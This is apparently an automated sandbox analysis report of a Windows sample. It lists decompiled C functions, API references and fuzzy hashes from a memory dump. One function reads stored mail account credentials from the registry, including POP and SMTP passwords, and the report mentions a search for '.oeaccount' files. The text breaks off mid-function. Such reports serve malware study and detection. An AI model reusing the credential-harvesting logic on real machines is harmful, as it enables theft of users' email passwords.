0x00406116
0x0040611e
0x00406120
0x00406124
0x0040612e
0x00406133
0x00406137
0x0040613c
0x00406146
0x00406146

APIs

malloc.MSVCRT ref: 00406116
memcpy.MSVCRT ref: 0040612E
free.MSVCRT(00000000,00000000,Mt,00406B49,00000001,?,00000000,Mt,00406D88,00000000,?,?), ref: 00406137

Strings

Mt, xrefs: 004060FA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: freemallocmemcpy
String ID: Mt
API String ID: 3056473165-2848310829
Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798

Uniqueness

Uniqueness Score: -1.00%

Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}

0x00411932
0x00411939
0x0041193b
0x0041193c
0x00411941
0x00411942
0x00411949
0x0041194b
0x0041194c
0x00411951
0x00411952
0x00411959
0x0041195b
0x0041195c
0x00411961
0x00411962
0x00411969
0x0041196b
0x0041196c
0x00000000
0x00411971
0x00411972

APIs

??3@YAXPAX@Z.MSVCRT ref: 0041193C
??3@YAXPAX@Z.MSVCRT ref: 0041194C
??3@YAXPAX@Z.MSVCRT ref: 0041195C
??3@YAXPAX@Z.MSVCRT ref: 0041196C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C

Uniqueness

Uniqueness Score: -1.00%

Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}

0x0040787d
0x00407884
0x0040788b
0x0040788c
0x00407891
0x0040789b
0x004078a5
0x004078aa
0x004078b8
0x004078b9
0x004078c2
0x004078c3
0x004078c8
0x004078d6
0x004078d7
0x004078e0
0x004078e1
0x004078e6
0x004078ec
0x004078f1
0x004078f9
0x00000000
0x004078f9
0x004078fe

APIs

??2@YAPAXI@Z.MSVCRT ref: 004078A5
??2@YAPAXI@Z.MSVCRT ref: 004078C3
??2@YAPAXI@Z.MSVCRT ref: 004078E1
??2@YAPAXI@Z.MSVCRT ref: 004078F1

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}

0x0040b8d7
0x0040b8d7
0x0040b8e0
0x0040b8e4
0x0040b8f5
0x0040b8fb
0x0040b900
0x0040b909
0x0040b920
0x0040b90b
0x0040b90e
0x0040b91a
0x0040b91a
0x0040b910
0x0040b915
0x0040b915
0x0040b91c
0x0040b91c
0x0040b925
0x0040b926
0x0040b92b
0x0040b934
0x0040b940
0x0040b942
0x0040b944
0x00000000
0x00000000
0x00000000
0x0040b936
0x0040b938
0x0040b946
0x0040b949
0x0040b950
0x0040b955
0x0040b95f
0x0040b976
0x0040b961
0x0040b961
0x0040b965
0x0040b972
0x0040b967
0x0040b96d
0x0040b96d
0x0040b965
0x0040b98b
0x0040b998
0x0040b9a1
0x0040b9a2
0x0040b9a8
0x0040b9ac
0x0040b9ac

APIs

Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28

_stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B

Strings

/stext, xrefs: 0040B926

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$_stricmpmemset
String ID: /stext
API String ID: 3575250601-3817206916
Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD

Uniqueness

Uniqueness Score: -1.00%

Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}

0x00406264
0x00406270
0x00406277

APIs

Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB

CreateFontIndirectA.GDI32(?), ref: 00406270

Strings

Arial, xrefs: 0040625C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFontIndirectmemsetstrcpy
String ID: Arial
API String ID: 3275230829-493054409
Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9

Uniqueness

Uniqueness Score: -1.00%

Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}

0x004047a0
0x004047a2
0x004047a8
0x004047b0
0x004047b6
0x004047c0
0x004047c8
0x004047ce
0x004047d0
0x004047d0
0x004047ce
0x004047db
0x004047e4
0x004047e8
0x004047e8
0x004047f0

APIs

Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806

LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32 ref: 0040EB35

Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55

Uniqueness

Uniqueness Score: -1.00%

Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}

0x004047f1
0x004047f9
0x004047ff
0x00404803
0x00404806
0x0040480c
0x0040480c
0x00404810

APIs

FreeLibrary.KERNELBASE(?,?), ref: 00404806

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x00405ef6
0x00405efc

APIs

CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24

Uniqueness

Uniqueness Score: -1.00%

Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}

0x0040e894
0x0040e897
0x0040e89d
0x0040e8a0
0x0040e8a6
0x00000000
0x0040e8a6
0x0040e8aa

APIs

FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}

0x0040eda0
0x0040eda9

APIs

EnumResourceNamesA.KERNEL32 ref: 0040EDA0

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}

0x00406f5b
0x00406f62
0x00406f65
0x00406f6b
0x00000000
0x00406f6b
0x00406f6e

APIs

FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04

Uniqueness

Uniqueness Score: -1.00%

Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x0040614f
0x0040615f

APIs

GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}

0x0040eb52
0x0040eb58

APIs

RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}

0x00402d9a
0x00402d9a
0x00402d9a
0x00402dad
0x00402db7
0x00402dc0
0x00402dc7
0x00402dca
0x00402dcd
0x00402dd8
0x00402ddf
0x00402de0
0x00402de6
0x00402df2
0x00402df3
0x00402df8
0x00402dfb
0x00402e07
0x00402e0a
0x00402e14
0x00402e2a
0x00402e40
0x00402e56
0x00402e67
0x00402e78
0x00402e9d
0x00402e9f
0x00402e9f
0x00402eb1
0x00402ec4
0x00402eda
0x00402ef0
0x00402f04
0x00402f18
0x00402f3d
0x00402f3f
0x00402f3f
0x00402f43
0x00402f51
0x00402f5e
0x00402f63
0x00402f6c
0x00402f74
0x00402f74
0x00402f80
0x00402f89
0x00402f89
0x00402f8e
0x00402f93
0x00402f9b
0x00402f9b
0x00402fa7
0x00402fb0
0x00402fb0
0x00000000
0x00402fb8
0x00402fbf

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

strcpy.MSVCRT(?,?), ref: 00402EB1
strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
strcpy.MSVCRT(?,?), ref: 00402F51
strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
RegCloseKey.ADVAPI32(?), ref: 00402FB8

Strings

SMTPAccount, xrefs: 00402ED0
EmailAddress, xrefs: 00402E20
SMTPPassword, xrefs: 00402F2B
PopPassword, xrefs: 00402E8B
SMTPServer, xrefs: 00402EE6
DisplayName, xrefs: 00402DF3
SMTPLogSecure, xrefs: 00402F10
PopAccount, xrefs: 00402E36
PopServer, xrefs: 00402E4C
PopLogSecure, xrefs: 00402E70
PopPort, xrefs: 00402E5F
SMTPPort, xrefs: 00402EFC

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$QueryValue$CloseOpen
String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
API String ID: 4127491968-1534328989
Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004033D7, Relevance: 7.6, Strings: 6, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
